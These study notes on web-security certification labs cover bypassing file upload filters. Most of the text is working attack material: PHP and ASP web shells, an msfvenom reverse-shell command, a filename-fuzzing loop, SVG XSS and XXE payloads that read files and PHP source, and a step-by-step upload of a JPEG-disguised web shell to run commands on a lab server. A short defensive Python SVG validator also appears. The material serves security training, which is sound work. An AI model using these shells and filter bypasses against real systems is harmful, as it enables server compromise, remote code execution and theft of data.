Burp Suite Certified Practitioner study notes on file upload bypass
Web Shell | Description |
---|---|
`<?php file_get_contents('/etc/passwd'); ?>` | Basic PHP file read |
`<?php system('hostname'); ?>` | Basic PHP command execution |
`<?php echo file_get_contents('/etc/hostname'); ?>` | PHP script that executes on the back-end server and returns its hostname (arbitrary file upload check) |
`<?php system($_REQUEST['cmd']); ?>` | Basic PHP web shell |
`<?php echo shell_exec($_GET[ "cmd" ]); ?>` | Alternative PHP web shell using the shell_exec function |
`<% eval request('cmd') %>` | Basic ASP web shell |
`msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php` | Generate a PHP reverse shell |
`/usr/share/seclists/Web-Shells` | List of web shells for frameworks such as CFM, FuzzDB, JSP, Laudanum, Magento, PHP, Vtiger and WordPress |
PHP Web Shell | PHP Web Shell |
PHP Reverse Shell | PHP Reverse Shell |
Web/Reverse Shells | List of Web Shells and Reverse Shells |
Command | Description |
---|---|
Client-Side Bypass | Bypass the client-side file type validations |
[CTRL+SHIFT+C] | Toggle Page Inspector |
Blacklist Bypass | Blacklist filters: use Burp Suite Intruder to upload a single file name with a list of possible extensions, then use Intruder again to send a GET request to every uploaded file to identify which ones execute PHP on the target |
shell.phtml | Uncommon extension |
shell.pHp | Case manipulation |
PHP Extensions | List of PHP Extensions |
ASP Extensions | List of ASP Extensions |
Web Extensions | List of Web Extensions |
Whitelist Bypass | Whitelisting extensions |
shell.jpg.php | Double extension bypass example |
shell.php.jpg | Reverse double extension |
Client-side bypass: alter the HTML so the browser no longer validates the file, by removing the `validate()` call and optionally clearing the `onchange` and `accept` attribute values.
Character injection before/after the extension, to generate a list of candidate filenames for bypassing whitelist or blacklist upload filters:

```bash
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
  for ext in '.php' '.php3' '.php4' '.php5' '.php7' '.php8' '.pht' '.phar' '.phpt' '.pgif' '.phtml' '.phtm'; do
    echo "shell$char$ext.jpg" >> filenames_wordlist.txt
    echo "shell$ext$char.jpg" >> filenames_wordlist.txt
    echo "shell.jpg$char$ext" >> filenames_wordlist.txt
    echo "shell.jpg$ext$char" >> filenames_wordlist.txt
  done
done
```
Command | Description |
---|---|
Web Content-Types | List of Web Content-Types |
Content-Types | List of All Content-Types |
File Signatures | List of File Signatures/Magic Bytes |
Example of the payload code for the file being uploaded: `<?php echo file_get_contents('/flag.txt'); ?>`. Add `GIF8` at the top of the file body and keep the file name as `shell.php`. The `Content-Type:` header value is then the payload position for Burp Suite Intruder, using the above wordlists.
Potential Attack | File Types |
---|---|
XSS | HTML, JS, SVG, GIF |
XXE / SSRF | XML, SVG, PDF, PPT, DOC |
DoS | ZIP, JPG, PNG |
This web server exercise employs Client-Side, Blacklist, Whitelist, Content-Type, and MIME-Type filters to ensure the uploaded file is an image. Try to combine all of the attacks you learned so far to bypass these filters and upload a PHP file and read the flag at "/flag.txt"
Client-Side: the HTML script validation functions are cleared before the DOM loads.

Blacklist & Whitelist: fuzzing filenames with various characters injected around the extension reveals a valid filename, `shell.jpg:.phar`, which determines the usable filename and extension.

Content-Type & MIME-type: the back end checks the Content-Type and MIME type combination; fuzzing with a Content-Type wordlist identifies the valid values as:

```
Content-Type: image/gif
GIF8
```

Get the sensitive info flag: `GET /profile_images/shell.jpg:.phar`.
Burp Suite Certified Practitioner study exercises and notes:
This File Upload exercise contains a vulnerable upload function that is meant to be secure against arbitrary file uploads, but the content of the uploaded files can execute server-side to read sensitive files via XXE or to trigger stored XSS.
XSS inside an SVG image file, `htb.svg`, uploaded to the target:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
<rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
<script type="text/javascript">alert(window.origin);</script>
</svg>
```
When the XML SVG file is uploaded, the XSS is triggered.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///flag.txt"> ]>
<svg>&xxe;</svg>
```
The above renders on the index landing page and retrieves the contents of `/flag.txt`.

The source code of PHP files can be retrieved by Base64-encoding it through the `php://filter` wrapper, which prevents execution on the server, using the following XML payload in the uploaded file:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=upload.php"> ]>
<svg>&xxe;</svg>
```
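The two SVG payloads above (a `<script>` element and an external entity) are the content an image-upload handler must refuse even when the extension and Content-Type look fine. The following Python is an added example, not code from these notes or from the lab application: it checks an uploaded SVG body for a DTD on the raw bytes before any parser touches it, then parses and enforces an element and attribute allowlist. The allowlist of tags and the sample uploads are constructed for this example; a real deployment would tune the tag set to what it actually needs to render.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample uploads: a benign icon plus the kinds of SVG/XML payloads
# the notes describe (script element, DOCTYPE with external entity, event handler).
SAMPLES = {
    "benign.svg": (b'<?xml version="1.0"?>'
                   b'<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">'
                   b'<rect x="1" y="1" width="1" height="1" fill="green"/></svg>'),
    "xss.svg": (b'<?xml version="1.0" encoding="UTF-8"?>\n'
                b'<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">\n'
                b'<rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />\n'
                b'<script type="text/javascript">alert(window.origin);</script>\n</svg>'),
    "xxe.svg": (b'<?xml version="1.0" encoding="UTF-8"?>\n'
                b'<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///flag.txt"> ]>\n'
                b'<svg>&xxe;</svg>'),
    "handler.svg": (b'<svg xmlns="http://www.w3.org/2000/svg">'
                    b'<circle r="1" onload="alert(1)"/></svg>'),
    "truncated.svg": b"<svg><rect",
}

# Elements a plain icon needs; anything else (script, foreignObject, a, image,
# use, ...) is refused. This set is the example's own choice.
SAFE_TAGS = {"svg", "g", "rect", "circle", "ellipse", "line", "polyline",
             "polygon", "path", "title", "desc"}


def check_svg(data: bytes):
    """Return (accepted, reason) for an uploaded SVG body.

    The DTD test runs on the raw bytes before any parser sees the document,
    so no entity declaration is ever processed.
    """
    if re.search(rb"<!\s*(DOCTYPE|ENTITY)", data, re.I):
        return False, "DOCTYPE/ENTITY declaration not allowed (XXE)"
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return False, f"not well-formed XML: {exc}"
    for el in root.iter():
        tag = el.tag.split("}")[-1].lower()          # drop the namespace prefix
        if tag not in SAFE_TAGS:
            return False, f"element <{tag}> not in allowlist"
        for name, value in el.attrib.items():
            local = name.split("}")[-1].lower()
            if local.startswith("on"):               # onload, onclick, ...
                return False, f"event handler attribute {local!r}"
            if re.match(r"\s*(javascript|data)\s*:", value, re.I):
                return False, f"attribute {local!r} carries a scriptable URI"
    return True, "ok"


def scan_samples():
    """Run every constructed sample through check_svg; only the benign icon passes."""
    return {name: check_svg(body)[0] for name, body in SAMPLES.items()}


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:14} -> {check_svg(body)}")
```

Rejecting any DOCTYPE is deliberate: an icon never needs one, and it removes the entity expansion path entirely rather than trying to distinguish safe from unsafe declarations. Serving accepted SVGs with `Content-Disposition: attachment` or from a separate origin closes the remaining stored-XSS exposure for files this check lets through.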
You are contracted to perform a penetration test for a company's e-commerce web application. The web application is in its early stages, so you will only be testing any file upload forms you can find. Try to utilize what you learned in this module to understand how the upload form works and how to bypass various validations in place (if any) to gain remote code execution on the back-end server.
Enumeration and discovery of the web application: the contact form contains a screenshot file upload function. Intercept it with Burp Suite and start fuzzing file uploads. Remove the client-side HTML check that calls `checkFile(this)` in the JavaScript source:

```html
<input name="uploadFile" id="uploadFile" type="file" class="custom-file-input" id="inputGroupFile02" onchange="checkFile(this)" accept=".jpg,.jpeg,.png">
<label id="inputGroupFile01" class="custom-file-label" for="inputGroupFile02" aria-describeby="inputGroupFileAddon02">
```
Enumerate whether an SVG extension with XML content can be uploaded. The file `/etc/hostname` was read successfully as a POC.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/contact/upload.php"> ]>
<svg>&xxe;</svg>
```
Get the source code of all the PHP files to find web directories, blacklist and whitelist filters, etc. Content of `upload.php`:
```php
<?php
require_once('./common-functions.php');

// uploaded files directory
$target_dir = "./user_feedback_submissions/";

// rename before storing
$fileName = date('ymd') . '_' . basename($_FILES["uploadFile"]["name"]);
$target_file = $target_dir . $fileName;

// get content headers
$contentType = $_FILES['uploadFile']['type'];
$MIMEtype = mime_content_type($_FILES['uploadFile']['tmp_name']);

// blacklist test
if (preg_match('/.+\.ph(p|ps|tml)/', $fileName)) {
    echo "Extension not allowed";
    die();
}

// whitelist test
if (!preg_match('/^.+\.[a-z]{2,3}g$/', $fileName)) {
    echo "Only images are allowed";
    die();
}

// type test
foreach (array($contentType, $MIMEtype) as $type) {
    if (!preg_match('/image\/[a-z]{2,3}g/', $type)) {
        echo "Only images are allowed";
        die();
    }
}

// size test
if ($_FILES["uploadFile"]["size"] > 500000) {
    echo "File too large";
    die();
}

if (move_uploaded_file($_FILES["uploadFile"]["tmp_name"], $target_file)) {
    displayHTMLImage($target_file);
} else {
    echo "File failed to upload";
}
```
The above PHP source code reveals the renamed path and file name; for example: `http://94.237.59.206:37111/contact/user_feedback_submissions/230723_test.png`
The content of apache2.conf provides log file names but nothing else.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/apache2/apache2.conf"> ]>
<svg>&xxe;</svg>
```
Run Burp Intruder to determine valid file extensions, using the PHP extension wordlist with the payload position on the extension of the filename and the Sniper attack type. Identified a valid extension: `.phar.jpeg`.
Create a PHP web shell with the MIME type changed to bypass the filters. Create the following file as `shell.phar.jpeg` in the Linux Mousepad editor:

```
AAAA
<?php echo system($_GET["cmd"]);?>
```
Change the MIME type using `hexeditor` and enter the magic numbers by replacing the `AAAA` values. Magic MIME type bytes for JPEG = `FF D8 FF DB`.
Upload the modified web shell file to the target. Once the image web shell file is uploaded, browse to it at `http://1.2.3.4/contact/user_feedback_submissions/230723_shell.phar.jpeg?cmd=cat+/flag.txt` to obtain the flag.